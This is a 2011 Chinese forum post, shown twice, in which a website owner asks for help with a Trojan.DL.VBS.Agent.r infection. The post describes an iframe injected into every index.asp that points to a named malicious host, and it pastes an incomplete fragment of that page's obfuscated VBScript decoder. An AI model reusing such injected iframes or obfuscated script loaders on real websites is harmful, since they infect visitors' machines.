文章描述了如何解决网站出现的Trojan.DL.VBS.Agent.r病毒感染问题,以及如何正确使用解密工具解决加密的index.asp页面问题。通过下载整个网站并使用最新版瑞星进行扫描,最终定位到加密代码,并尝试使用解密工具进行解密。
Trojan.DL.VBS.Agent.r 脚本病毒 ASP解密
2011年04月18日
Trojan.DL.VBS.Agent.r 脚本病毒
问题:1.Trojan.DL.VBS.Agent.r 的情况
2.ASP解密 怎么用?
描述:
打开我的网站时,瑞星显示有这种病毒Trojan.DL.VBS.Agent.r
病毒位置:C:\Documents and Settings\Administrator.MS-E496B8708F13\Local Settings\Temporary Internet Files\Content.IE5
\ALNSDGZI xx[1].htm
下载整个网站,用最新瑞星查不出来。
后在网站的所有的index.asp(包括子目录)中都发现:代码中最后位置加了这么句代码:
打开这个页只有个 统计。又iframe了。
最后找到这个页:http://wydos.3322.org/kehu.htm
代码如下:(加密的)
hu="琳 >tpircs/""tpircSBV""=egaugnal tpircs "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
下载WEBfree_web.exe 解密却不能运行。没有装VB。装个VB运行库还是少文件:richtx32.ocx
网上baidu了下,没有找到。
有高人在的请指点!小弟先谢了。
2011年04月18日
Trojan.DL.VBS.Agent.r 脚本病毒
问题:1.Trojan.DL.VBS.Agent.r 的情况
2.ASP解密 怎么用?
描述:
打开我的网站时,瑞星显示有这种病毒Trojan.DL.VBS.Agent.r
病毒位置:C:\Documents and Settings\Administrator.MS-E496B8708F13\Local Settings\Temporary Internet Files\Content.IE5
\ALNSDGZI xx[1].htm
下载整个网站,用最新瑞星查不出来。
后在网站的所有的index.asp(包括子目录)中都发现:代码中最后位置加了这么句代码:
打开这个页只有个 统计。又iframe了。
最后找到这个页:http://wydos.3322.org/kehu.htm
代码如下:(加密的)
hu="琳 >tpircs/""tpircSBV""=egaugnal tpircs "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
下载WEBfree_web.exe 解密却不能运行。没有装VB。装个VB运行库还是少文件:richtx32.ocx
网上baidu了下,没有找到。
有高人在的请指点!小弟先谢了。
扫一扫
665
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
